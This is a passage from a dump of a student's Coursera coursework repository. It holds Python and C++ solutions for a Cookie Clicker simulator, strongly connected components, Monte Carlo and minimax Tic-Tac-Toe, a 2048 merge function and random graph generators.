curr_cps)\n \n return time\n \n def wait(self, time):\n \"\"\"\n Wait for given amount of time and update state\n\n Should do nothing if time <= 0.0\n \"\"\"\n if (time > 0.0):\n self._curr_time += time\n self._curr_cookies += time * self._curr_cps\n # using self._tot_cookies += self._curr_cookies\n # give incorrect total cookies value since\n # it also adds the earlier cookie value\n self._tot_cookies += time * self._curr_cps \n \n def buy_item(self, item_name, cost, additional_cps):\n \"\"\"\n Buy an item and update state\n\n Should do nothing if you cannot afford the item\n \"\"\"\n if (cost <= self.get_cookies()):\n self._curr_cookies -= cost\n self._curr_cps += additional_cps\n self._game_history.append((self.get_time(), item_name, \n cost, self._tot_cookies))\n \n \ndef simulate_clicker(build_info, duration, strategy):\n \"\"\"\n Function to run a Cookie Clicker game for the given\n duration with the given strategy. Returns a ClickerState\n object corresponding to the final state of the game.\n \"\"\"\n # make a copy of the build_info object so as not to \n # mutate it\n build_info_copy = build_info.clone()\n # create a new Clickerstate\n clicker_state = ClickerState()\n # loop until duration has passed\n while (clicker_state.get_time() <= duration):\n # determine which item to buy based on the strategy\n item = strategy(clicker_state.get_cookies(),\n clicker_state.get_cps(),\n clicker_state.get_history(),\n duration - clicker_state.get_time(),\n build_info_copy)\n # if item is None, then that means no more items\n # can be purchased, and simulation should stop\n if (item == None):\n break\n # find the cost of the item\n item_cost = build_info_copy.get_cost(item)\n #print \"item cost: \", item_cost\n # Using the cost, find the time until we have enough \n # cookies to buy the item\n time_needed = clicker_state.time_until(item_cost)\n #print \"time needed: \", time_needed\n # stop the simulation if we do not have enough\n # time to buy the item\n if (time_needed + clicker_state.get_time() > duration):\n #print time_needed + clicker_state.get_time()\n break\n \n # wait until the time when we can buy the item\n clicker_state.wait(time_needed)\n # buy the item\n clicker_state.buy_item(item, item_cost, \n build_info_copy.get_cps(item))\n # update the build information which updates the cost\n # of the item\n build_info_copy.update_item(item)\n \n \n # if time is still left after stopping the simulation\n # allow cookies to accumulate for that amount of time\n if (clicker_state.get_time() < duration):\n clicker_state.wait(duration - clicker_state.get_time())\n \n \n \n return clicker_state\n\n\ndef strategy_cursor_broken(cookies, cps, history, time_left, build_info):\n \"\"\"\n Always pick Cursor!\n\n Note that this simplistic (and broken) strategy does not properly\n check whether it can actually buy a Cursor in the time left. Your\n simulate_clicker function must be able to deal with such broken\n strategies. Further, your strategy functions must correctly check\n if you can buy the item in the time left and return None if you\n can't.\n \"\"\"\n return \"Cursor\"\n\ndef strategy_none(cookies, cps, history, time_left, build_info):\n \"\"\"\n Always return None\n\n This is a pointless strategy that will never buy anything, but\n that you can use to help debug your simulate_clicker function.\n \"\"\"\n return None\n\ndef strategy_cheap(cookies, cps, history, time_left, build_info):\n \"\"\"\n Always buy the cheapest item you can afford in the time left.\n \"\"\"\n # initalize varialbes\n cheapest_cost = float(\"inf\")\n cheapest_item = None\n # calculate the maximum cookies that can be used to\n # buy an item\n max_cost = cookies + time_left * cps\n # get all the items available to buy\n items_list = build_info.build_items() \n \n # find the cheapest item that can be afforded\n for item in items_list:\n current_item_cost = build_info.get_cost(item)\n if (current_item_cost <= max_cost \n and current_item_cost < cheapest_cost):\n cheapest_cost = current_item_cost\n cheapest_item = item\n \n return cheapest_item\n\ndef strategy_expensive(cookies, cps, history, time_left, build_info):\n \"\"\"\n Always buy the most expensive item you can afford in the time left.\n \"\"\"\n # initalize varialbes\n expensive_cost = float(\"-inf\")\n expensive_item = None\n # calculate the maximum cookies that can be used to\n # buy an item \n max_cost = cookies + time_left * cps\n # get all the items available to buy\n items_list = build_info.build_items()\n\n # find the most expensive item that can be afforded\n for item in items_list:\n current_item_cost = build_info.get_cost(item)\n if (current_item_cost <= max_cost \n and current_item_cost > expensive_cost):\n expensive_cost = current_item_cost\n expensive_item = item\n \n return expensive_item\n\ndef strategy_best(cookies, cps, history, time_left, build_info):\n \"\"\"\n Always picks the item that minimizes the item's \n cost to item's cps \n \"\"\"\n # initalize varialbes\n min_cost_to_cps = float(\"inf\")\n best_item = None\n # calculate the maximum cookies that can be used to\n # buy an item\n max_cost = cookies + time_left * cps\n # get all the items available to buy\n items_list = build_info.build_items()\n \n # buy the item that minimizes the cost per cps\n for item in items_list:\n item_cost = build_info.get_cost(item)\n item_cps = build_info.get_cps(item)\n item_cost_to_cps = item_cost / item_cps \n if (item_cost <= max_cost and \n item_cost_to_cps < min_cost_to_cps):\n min_cost_to_cps = item_cost_to_cps\n best_item = item\n \n return best_item\n \ndef run_strategy(strategies, time):\n \"\"\"\n Run a simulation for all strategies for the give time\n \n strategies is a dictionary with key the strategy name\n of type string and value the strategy function name\n \"\"\"\n # initialize the local variables\n states = []\n histories = []\n plot_history = []\n strategy_names = []\n\n # store all the states and their names for each strategy\n for strategy_name, strategy_type in strategies.items():\n state = simulate_clicker(provided.BuildInfo(), \n time, strategy_type)\n states.append(state)\n strategy_names.append(strategy_name)\n print strategy_name, \":\", state\n \n # get the history of each strategy's state \n for state in states:\n histories.append(state.get_history())\n \n # store just the time and total cookies from the history \n # for plotting purpose\n for history in list(histories):\n history = [(item[0], item[3]) for item in history]\n plot_history.append(history)\n \n # plot all strategies time vs total cookies on one figure \n simpleplot.plot_lines(\"strategy plots\", 1000, 600, 'Time', 'Total Cookies', \n plot_history, True, strategy_names)\n \ndef run():\n \"\"\"\n Run the simulator.\n \"\"\" \n \n strategies = {\"Cheap\":strategy_cheap, \n \"Expensive\": strategy_expensive,\n \"Best\": strategy_best}\n \n run_strategy(strategies, SIM_TIME)\n\n#####################################\n#run the simmulation\n#####################################\nrun()\n\n"
},
{
"alpha_fraction": 0.6042701601982117,
"alphanum_fraction": 0.6235294342041016,
"avg_line_length": 32.56325149536133,
"blob_id": "919d6cf90173dd61f9fdc828180ecc19ed5ad1b7",
"content_id": "b421a47ac2ac2215c7c5807e0686a6c512e5033f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 11497,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 332,
"path": "/Algorithms on Graphs/Assignment2/strongly_connected.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: strongly_connected.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-31\r\n// description: Problem 3 of the second assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was : Compute the number of strongly connected components of a given\r\n//\t\t\t\tdirected graph with n vertices and m edges.\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tall other functions had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.09/1.00 sec, max memory used: 11.02/512 MB. \r\n\r\n\r\n#include <algorithm>\r\n#include <iostream>\r\n#include <vector>\r\n#include <numeric>\r\n\r\n\r\n// first element stores number for each node visited in pre-order while the second one\r\n// stores post order visit number for that node\r\n#define preAndPost pair<int,int>\r\n\r\nusing std::vector;\r\nusing std::pair;\r\n\r\n//sort criteria based on max post order number\r\nstruct sort_pairs {\r\n\tbool operator()(const std::pair<preAndPost, int> &left, const std::pair<preAndPost, int> &right) {\r\n\t\treturn left.first.second > right.first.second;\r\n\t}\r\n};\r\n\r\n// Takes a Directed Graph and reverses its edges\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e4; number of edges of adj is between 0 and 10e4; rev_adj.size() = adj.size()\r\n//\t\tnumber of edges of rev_adj is 0.\r\n//\r\n// POST: updates rev_adj such that all the edges of adj are reversed.\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t rev_adj = a graph with only nodes but no edges\r\nvoid reverse_graph(vector< vector <int> > adj, vector< vector <int> > &rev_adj) {\r\n\r\n\r\n\r\n\tfor (vector<int>::size_type v = 0; v < adj.size(); v++) {\r\n\t\tfor (vector<int>::size_type u = 0; u < adj[v].size(); u++) {\r\n\t\t\trev_adj[adj[v][u]].push_back(v);\r\n\t\t}\r\n\t}\r\n\r\n}\r\n\r\n// Recursively updates the visited status of all the nodes of the graph adj\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e4; number of edges of adj is between 0 and 10e4; visited.size() = adj.size()\t\r\n//\r\n// POST: updates visited vector with 1 for nodes visited and sends the total number of nodes that were visited.\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t visited = keeps track of all the vertices that have already been visited\r\n//\t\t x = the vertice and its reachable neighbours to be marked visited\r\n//\t\t i = a variable used to keep track of total number of visited nodes in each function call.\r\n\r\nint mark_visited(vector<vector<int> > &adj, vector<int> &visited, int x, int i) {\r\n\r\n\tif (adj[x].size() == 0) {\r\n\r\n\t\tvisited[x] = 1;\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tvisited[x] = 1;\r\n\ti++;\r\n\r\n\tfor (vector<int>::size_type v = 0; v < adj[x].size(); v++) {\r\n\r\n\t\tif (visited[adj[x][v]] == 0) {\r\n\r\n\t\t\ti = mark_visited(adj, visited, adj[x][v], i);\r\n\r\n\t\t}\r\n\t}\r\n\r\n\treturn i;\r\n}\r\n\r\n\r\n// Recursively updates the pre_pos vector with pre and post order visit number of a vertice and it reachable \r\n// neighbours. Returns the largest post order visit number. \r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e4; number of edges of adj is between 0 and 10e4; visited.size() = adj.size();\r\n//\t\tpre_pos.size() = adj.size(). 0 <= x < adj.size(). 0 <= i < adj.size()*2\r\n//\r\n// POST: updates visited vector with 1 for nodes visited and pre_pos vector with pre and post visit numbers\r\n//\t\t and their respective vertices. Returns the maximum post order visit number from visited nodes\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t visited = keeps track of all the vertices that have already been visited\r\n//\t\t pre_pos = stores the vertice and it respective pre and post order visit number.\r\n//\t\t x = the vertice and its reachable neighbours to be marked visited and their pre and post order numbers\r\n//\t\t\t to updated accordingly.\r\n//\t\t i = Used to keep track of the pre and post order visit numbers\r\n\r\nint explore(vector<vector<int> > &adj, vector<int> &visited, vector< pair <preAndPost, int > > &pre_pos, int x, int i) {\r\n\r\n\r\n\tif (adj[x].size() == 0) {\r\n\r\n\t\tpre_pos[x].first.first = i;\r\n\t\tpre_pos[x].first.second = i + 1;\r\n\t\tpre_pos[x].second = x;\r\n\t\tvisited[x] = 1;\r\n\t\treturn i + 1;\r\n\r\n\t}\r\n\t//mark the current node (i.e. x as visited)\r\n\tvisited[x] = 1;\r\n\r\n\t//update the pre order visit number\r\n\tpre_pos[x].first.first = i;\r\n\t//associate this pre order number with the current vertice x\r\n\tpre_pos[x].second = x;\r\n\r\n\tfor (vector<int>::size_type v = 0; v < adj[x].size(); v++) {\r\n\r\n\t\tif (visited[adj[x][v]] == 0) {\r\n\r\n\t\t\t// Do Depth first exploration of neighbours of the current vertice x and mark\r\n\t\t\t// their pre and post order visit numbers recursively\r\n\t\t\ti = explore(adj, visited, pre_pos, adj[x][v], i + 1);\r\n\r\n\t\t}\r\n\t}\r\n\r\n\t//update the post order number\r\n\tpre_pos[x].first.second = i + 1;\r\n\r\n\treturn i + 1;\r\n\r\n\r\n}\r\n\r\n// Updates the pre_pos vector with pre and post order visit number of all vertices in a graphs using the helper\r\n// function explore\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e4; number of edges of adj is between 0 and 10e4; visited.size() = adj.size();\r\n//\t\tpre_pos.size() = adj.size(). \r\n// POST: updates pre_pos vector with pre and post visit numbers for the given graph adj\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t visited = keeps track of all the vertices that have already been visited\r\n//\t\t pre_pos = stores the vertice and it respective pre and post order visit number.\r\n\r\nvoid DFS(vector< vector <int> > adj, vector<int> visited, vector< pair< preAndPost, int > > &pre_pos) {\r\n\r\n\tint i = 0;\r\n\r\n\tfor (vector<int>::size_type v = 0; v < adj.size(); v++) {\r\n\r\n\t\tif (visited[v] == 0) {\r\n\r\n\t\t\t\r\n\t\t\ti = explore(adj, visited, pre_pos, v, i);\r\n\t\t\t\r\n\t\t\ti++;\r\n\t\t}\r\n\t}\r\n\r\n\r\n}\r\n\r\n\r\n//The idea behind finding the strongly connected components is as follows:\r\n/***************************************************************************************************************************\r\n// if v is in the sink strongly connected component (SSC)--v may not be a sink itself--then\r\n// all the vertice reachable from v and v itself form a SSC. Thus if we find a vertice in sink SCC\r\n// and explore all the vertice reachable from it, we can find one strongly connected component of a graph\r\n//\r\n// In order to do so we use the following theorem:\r\n// --- \"If C and C' are two SSC where there's an edge from some vertex of C to some vertex of C'.\r\n//\t The largest post number in C Is larger than the largest post number in C'.\" ---taken from\r\n//\t the lecture slides for this coure\r\n//\r\n// However, the largest post number is in the source SSC. Thus we reverse the given graph find the source SSC, which\r\n// is the sink SSC of the original graph by marking the pre and post number using the explore function above. The vertice\r\n// with the highest post number and all the reachable vertice from it forms a SSC. Next we explore the vertice with the second\r\n// largest post number and find all the reachable vertices from it to get the next SSC. We continue doing this until we have\r\n// visited all the vertices.\r\n//\r\n***************************************************************************************************************************/\r\n\r\n// Finds the number of strongly connected components of the graph\r\n// function explore\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e4; number of edges of adj is between 0 and 10e4; \r\n// POST: returns the total number of strongly connected component of the graph adj\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n\r\nint number_of_strongly_connected_components(vector< vector<int> > adj) {\r\n\r\n\r\n\t//To keep track of the total number of strongly connected components\r\n\tint result = 0;\r\n\t//Used to get the vertice with highest post order visit number\r\n\tint maxPosVer = 0;\r\n\tint adjSize = adj.size();\r\n\tint i = 0;\r\n\r\n\tvector< int > visited(adj.size(), 0);\r\n\tvector<vector <int> > rev_adj(adj.size(), vector<int>());\r\n\tvector< pair <preAndPost, int > > pre_pos(adj.size());\r\n\r\n\t\r\n\t//reverse the edges of the given graph\r\n\treverse_graph(adj, rev_adj);\r\n\r\n\t//mark pre and post number on the vertice of this reverse graph\r\n\tDFS(rev_adj, visited, pre_pos);\r\n\r\n\t//sort based on the vertice with highest post number to the lowest one\r\n\tstd::sort(pre_pos.begin(), pre_pos.end(), sort_pairs());\r\n\r\n\t//while all the vertices have not be visited\r\n\twhile (i < adjSize) {\r\n\r\n\t\tfor (vector<int>::size_type v = 0; v < adj.size(); v++) {\r\n\t\t\t//if the vertice has not been visited\r\n\t\t\tif (visited[pre_pos[v].second] == 0) {\r\n\r\n\t\t\t\t//store the vertice with the highest post number\r\n\t\t\t\tmaxPosVer = pre_pos[v].second;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\t// mark all the vertices reachable from maxPosVer and maxPosVer as visited \r\n\t\t// and update the number of visited vertices\r\n\t\tadjSize -= mark_visited(adj, visited, maxPosVer, 0);\r\n\t\t//increment the number of SCC\r\n\t\tresult++;\r\n\r\n\t}\r\n\r\n\treturn result;\r\n}\r\n\r\nint main() {\r\n\r\n\t// Few test case to check if the number_of_strongly_connected_components function and its helper functions works. \r\n\t//These are commented since the assignment requires the strongly_connected.cpp file to read input values and output\r\n\t//the respective results on the console\r\n\t/**************************************************************************************\r\n\t//Test 1\r\n\r\n\tvector< vector<int> > adj1(6, vector<int>());\r\n\r\n\tadj1[1 - 1].push_back(4 - 1);\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\r\n\tadj1[2 - 1].push_back(6 - 1);\r\n\tadj1[2 - 1].push_back(3 - 1);\r\n\r\n\tadj1[3 - 1].push_back(5 - 1);\r\n\r\n\tadj1[5 - 1].push_back(6 - 1);\r\n\r\n\tadj1[6 - 1].push_back(1 - 1);\r\n\r\n\tif (number_of_strongly_connected_components(adj1) == 2)\r\n\t\tstd::cout << \"Test 1 Passed...\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 1 Failed...\" << std::endl;\r\n\r\n\t//Test 2\r\n\tvector< vector<int> > adj2(5, vector<int>());\r\n\r\n\tadj2[2 - 1].push_back(1 - 1);\r\n\r\n\tadj2[3 - 1].push_back(2 - 1);\r\n\tadj2[3 - 1].push_back(1 - 1);\r\n\r\n\tadj2[4 - 1].push_back(3 - 1);\r\n\tadj2[4 - 1].push_back(1 - 1);\r\n\r\n\tadj2[5 - 1].push_back(2 - 1);\r\n\tadj2[5 - 1].push_back(3 - 1);\r\n\r\n\tif (number_of_strongly_connected_components(adj2) == 5)\r\n\t\tstd::cout << \"Test 2 Passed...\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 2 Failed...\" << std::endl;\r\n\r\n\r\n\r\n\t//Test 3\r\n\tvector< vector<int> > adj3(4, vector<int>());\r\n\r\n\tadj3[1 - 1].push_back(2 - 1);\r\n\r\n\tadj3[4 - 1].push_back(1 - 1);\r\n\r\n\tadj3[2 - 1].push_back(3 - 1);\r\n\r\n\tadj3[3 - 1].push_back(1 - 1);\r\n\r\n\tif (number_of_strongly_connected_components(adj3) == 2)\r\n\t\tstd::cout << \"Test 3 Passed...\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 3 Failed...\" << std::endl;\r\n\t\r\n\t//Test 4\r\n\tvector< vector<int> > adj4(500, vector<int>());\r\n\r\n\tif (number_of_strongly_connected_components(adj4) == 500)\r\n\t\tstd::cout << \"Test 4 Passed...\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 4 Failed...\" << std::endl;\r\n\r\n\t**************************************************************************************/\r\n\t// The code below was mostly provided as a part of the starter file for the assignment with few modifications\r\n\tsize_t n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector< vector<int> > adj(n, vector<int>());\r\n\tfor (size_t i = 0; i < m; i++) {\r\n\t\tint x, y;\r\n\t\tstd::cin >> x >> y;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t}\r\n\tstd::cout << number_of_strongly_connected_components(adj);\r\n\r\n\r\n}\r\n"
},
{
"alpha_fraction": 0.7736093401908875,
"alphanum_fraction": 0.782233715057373,
"avg_line_length": 177.38461303710938,
"blob_id": "9b9e4200acb148b8aa3e01c3dcf9e4038446746a",
"content_id": "61c01151693e6a8192801e13dc2a14e075dc4af6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2319,
"license_type": "no_license",
"max_line_length": 774,
"num_lines": 13,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project3 Tic-Tac-Toe(Monte Carlo)/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #3 - Tic-Tac-Toe(Monte Carlo)\n\nImplemented the machine player for Tic-Tac-Toe game using Monte Carlo in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_837ymbxE9L_47.py) and press the play button on the top left corner. \n\nMini-project overview taken from course page can be found below:\n* [Tic-Tac-Toe](https://en.wikipedia.org/wiki/Tic-tac-toe) is a simple children's game played on a <a href=\"https://www.codecogs.com/eqnedit.php?latex=3&space;\\times&space;3\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?3&space;\\times&space;3\" title=\"3 \\times 3\" /></a> grid. Players alternate turns placing an \"X\" or an \"O\" on an empty grid square. The first player to get three-in-a-row wins. If you know the appropriate strategy and your opponent does not, you cannot lose the game. Further, if both players understand the appropriate strategy the game will always end in a tie. An interesting variant of the game is \"reverse\" Tic-Tac-Toe in which you lose if you get three-in-a-row. The game is also more interesting if you play on larger square grids.\n\n* For this assignment, your task is to implement a machine player for Tic-Tac-Toe. Specifically, your machine player will use a Monte Carlo simulation to decide its next move. We will provide both a console-based interface to the game where your machine player will play against itself and a graphical user interface where you can play against your machine player. Although the game is played on a 3x3 grid, your version should be able to handle any square grid. We will continue to use the same grid conventions that we have used previously.\n\n* For this mini-project, we will provide you with a complete implementation of a Tic-Tac-Toe Board class. However, for your part of the mini-project, we will provide only a very minimal amount of [starting code](http://www.codeskulptor.org/#poc_ttt_template.py). We will also dispense with the phased description of the implementation process so that your coding task for this mini-project is a more realistic example of the software development process.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-1/supplement/7gPV5/mini-project-description>\n"
},
{
"alpha_fraction": 0.628324031829834,
"alphanum_fraction": 0.6348175406455994,
"avg_line_length": 38.43902587890625,
"blob_id": "cc6a625f6d4414b4ccd94344f9cccd29bf6f97dc",
"content_id": "943dfa24952ab6bb01960d56f82fd174b6f3b7eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3234,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 82,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project3 Tic-Tac-Toe(Minimax)/tic_tac_toe_minimax.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nMini-max Tic-Tac-Toe Player\n\"\"\"\n\nimport poc_ttt_gui\nimport poc_ttt_provided as provided\n\n# Set timeout, as mini-max can take a long time\nimport codeskulptor\ncodeskulptor.set_timeout(60)\n\n# SCORING VALUES - DO NOT MODIFY\nSCORES = {provided.PLAYERX: 1,\n provided.DRAW: 0,\n provided.PLAYERO: -1}\n\ndef mm_move(board, player):\n \"\"\"\n Make a move on the board.\n \n Returns a tuple with two elements. The first element is the score\n of the given board and the second element is the desired move as a\n tuple, (row, col).\n \"\"\"\n # get the current state of the board\n game_state = board.check_win()\n # check the base case when the game is over\n if (game_state != None):\n return SCORES[game_state], (-1,-1)\n else:\n # initialize a list that will store all moves to be maximized\n moves = []\n # get all the possible empty board positions where the\n # current player can make a move if the game is still in progress\n empty_squares = board.get_empty_squares()\n # iterate over all of these possible empty position on the current\n # board\n for empty_square in empty_squares: \n # create a copy of the board so as not to mutate the current board\n board_copy = board.clone()\n # make a move on the current empty location of the board copy \n board_copy.move(empty_square[0], empty_square[1], player)\n # call mm_move recursively to perform depth first search of the\n # current game board's children i.e all possible board layout\n score = mm_move(board_copy, provided.switch_player(player))[0]\n # if the score is such that the current player has won the game,\n # return that score, and th winning move location (row, col).\n # Otherwise store the score * SCORES[player] and the move location.\n # score * SCORES[player] is needed so that we can maximize the moves\n # for both players rather than maximizing for PLAYERX and minimizing \n # for PLAYERO\n if (score == SCORES[player]):\n return score, empty_square\n else:\n moves += [(score * SCORES[player], empty_square)]\n\n # find the move that has the max score. Since the score is multplied \n # by SCORES[player], we are actually maximizing for one player(PLAYERX)\n # and minimizing for the other(PLAYERO)\n max_move = list(max(moves))\n # change the move back to the original value \n max_move[0] = max_move[0] * SCORES[player]\n # return this max/minimzied move\n return tuple(max_move)\n \n\ndef move_wrapper(board, player, trials):\n \"\"\"\n Wrapper to allow the use of the same infrastructure that was used\n for Monte Carlo Tic-Tac-Toe.\n \"\"\"\n move = mm_move(board, player)\n assert move[1] != (-1, -1), \"returned illegal move (-1, -1)\"\n return move[1]\n\n# Test game with the console or the GUI.\n# Uncomment whichever you prefer.\n# Both should be commented out when you submit for\n# testing to save time.\n\n# provided.play_game(move_wrapper, 1, False) \npoc_ttt_gui.run_gui(3, provided.PLAYERO, move_wrapper, 1, False)\n"
},
{
"alpha_fraction": 0.5418288111686707,
"alphanum_fraction": 0.5914396643638611,
"avg_line_length": 31.078125,
"blob_id": "7cca75a6f66501bfba5cbe3d8107408ca09f2981",
"content_id": "10c42066af7beb6e6a6e26fbc610ed9077629fe0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2056,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 64,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project1 2048(Merge)/merge2048.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nMerge function for 2048 game.\n\"\"\"\n\ndef merge(line):\n \"\"\"\n Function that merges a single row or column in 2048.\n \"\"\"\n # create an empty list\n mergelst = []\n \n # put all non-zero values from the list line to begining of mergelst\n for val in list(line):\n if (val != 0):\n mergelst.append(val)\n \n # replace same pairs values with twice it's value\n mergelst2 = [];\n idx = 0\n while idx < (len(mergelst)):\n if (idx < len(mergelst)-1 and mergelst[idx] == mergelst[idx+1]):\n mergelst2.append(2*mergelst[idx])\n idx += 1\n else:\n mergelst2.append(mergelst[idx])\n \n idx +=1\n \n # add zeros at the end of merged list to make the size same as list line \n mergelst2.extend([0]*(len(line)-len(mergelst2)))\n \n return mergelst2\n\n## uncomment the tests below \n## 1- test an empty list. Expected output : Result = []\n#lst = merge([])\n#print \"Result = \", lst\n## 2- test a list of 1 element. Expected output: Result = [4]\n#lst = merge([4])\n#print \"Result = \", lst\n## 3- test lst of size 2 with no pairs.\n## Input : [8,4]. Expected output: Result = [8,4]\n#lst = merge([8,4])\n#print \"Result = \", lst\n## 4- test lst of size 2 with 1 pair.\n## Input : [8,8]. Expected output: Result = [16,0]\n#lst = merge([8,8])\n#print \"Result = \", lst\n## 5- test some combination of lst of size greater than 2 but even size.\n## Input : [2,2,0,0]. Expected output: Result = [4,0,0,0]\n#lst = merge([2,2,0,0])\n#print \"Result = \", lst\n## 6- test some combination of lst of size greater than 2 but odd.\n## Input : [2,2,2]. Expected output: Result = [4,2,0]\n#lst = merge([2,2,2])\n#print \"Result = \", lst\n## 7- test some combination of lst of odd size with set of pairs.\n## Input : [2,2,0,2,2]. Expected output: Result = [4,4,0,0,0]\n#lst = merge([2,2,0,2,2])\n#print \"Result = \", lst\n## 8- test some combination of lst of odd size with no pairs.\n## Input : [2,4,0,2,8]. Expected output: Result = [2,4,2,8,0]\n#lst = merge([2,4,0,2,8])\n#print \"Result = \", lst\n\n\n\n"
},
{
"alpha_fraction": 0.6429322361946106,
"alphanum_fraction": 0.6484498381614685,
"avg_line_length": 31.52991485595703,
"blob_id": "2ffc55b80c8715027a6ed5ad3e1a79079cc6261f",
"content_id": "37bbacd1d8fc0918c60af5870e990bfee47f870a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3806,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 117,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 2/alg_example_graphs.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFuntions to generate 2 types of ugraphs, the undirected ER graph\nand UPA graph\n\"\"\"\nimport random\nimport alg_upa_trial as upa\n\ndef make_complete_graph(num_nodes):\n \"\"\"\n create and return a complete graph with nodes from\n 0 to num_nodes - 1 for num_nodes > 0. Otherwise\n the function returns a dictionary corresponding to\n the empty graph\n\n Arguments:\n num_nodes {integer} -- number of nodes for the graph\n\n Returns:\n dictionary -- returns a dictionary corresponding to a complete directed\n graph with the specified number of nodes.\n \"\"\"\n # local variable for the complete graph\n graph = {}\n\n # return an empty graph if num_nodes is not positive\n if num_nodes <= 0:\n return graph\n\n for node in range(num_nodes):\n # create an adjacency list for a directed complete graph with no\n # self loops or parallel edges\n graph[node] = set([val for val in range(num_nodes) if val != node])\n\n return graph\n\n\ndef alg_er(num_nodes, p):\n \"\"\"\n generate a random graph based on Erdos Renyi(ER) model G(n, p)\n where each edge in the graph is added with probability p\n \n Arguments:\n num_nodes {integer} -- the total number of nodes for the generated graph\n p {float} -- the probability with which to add each edge to the generated graph\n \n Returns:\n dictionary -- return the ER random graph\n \"\"\"\n\n ugraph = {}\n all_edges = []\n\n if (num_nodes <= 0):\n return ugraph\n\n # create a graph of all nodes but no edges\n for node in range(num_nodes):\n ugraph[node] = set()\n\n # find all possible edges of the graph\n all_edges = (set([frozenset([node1, node2]) for node1 in range(num_nodes) \n for node2 in range(num_nodes) if node1 != node2]))\n \n # convert each edge from frozenset to list for indexing\n all_edges = [list(item) for item in all_edges]\n\n # add edges to the graph with probablity p\n for edge in all_edges:\n rand_prob = random.uniform(0,1)\n if rand_prob < p:\n ugraph[edge[0]].add(edge[1])\n ugraph[edge[1]].add(edge[0])\n\n return ugraph\n\ndef alg_upa(n_nodes, m_nodes):\n \"\"\"\n Uses the DPA algorithm provided in Q3 of the Application #1\n to generates a random undirected graph iteratively, where\n each iteration a new node is created, added to the graph,\n and connected to the subset of the existing node\n\n Arguments:\n n_nodes {integer} -- final number of nodes in the generated graph\n m_nodes {integer} -- number of existing nodes to which a new node is connected\n during each iteration\n\n Returns:\n dictionary -- the generated graph based on modified DPA algorithm for undirectef graph\n \"\"\"\n # create a complete graph of m_nodes noes\n upa_graph = make_complete_graph(m_nodes)\n\n # create the UPAtrial object corresponding to complete graph\n upa_trial = upa.UPATrial(m_nodes)\n\n # add each new node to the existing graph randomly\n # chosen with probability:\n # (in-degree of new_node + 1) / (in-degree of all nodes +\n # total number of existing nodes)\n # simulated by the run_trial of the UPATrial class\n for new_node in range(m_nodes, n_nodes):\n # randomly select m_nodes from the existing graph that\n # the new_node will be connected to. Remove if any\n # duplicate nodes in the m_nodes selected\n neighbors = upa_trial.run_trial(m_nodes)\n\n # update the existing graph to add this new node and its\n # neighbors\n upa_graph[new_node] = neighbors\n\n # add this new node to all the neighbor nodes since this\n # is a undirected graph\n for neighbor in neighbors:\n upa_graph[neighbor].add(new_node)\n\n return upa_graph\n"
},
{
"alpha_fraction": 0.5477582812309265,
"alphanum_fraction": 0.5735492706298828,
"avg_line_length": 32.681819915771484,
"blob_id": "2bcb022afa05caa9f79441478ce9001874624189",
"content_id": "8f90d234fc2d106d1331f28b91929653c5956aea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6669,
"license_type": "no_license",
"max_line_length": 151,
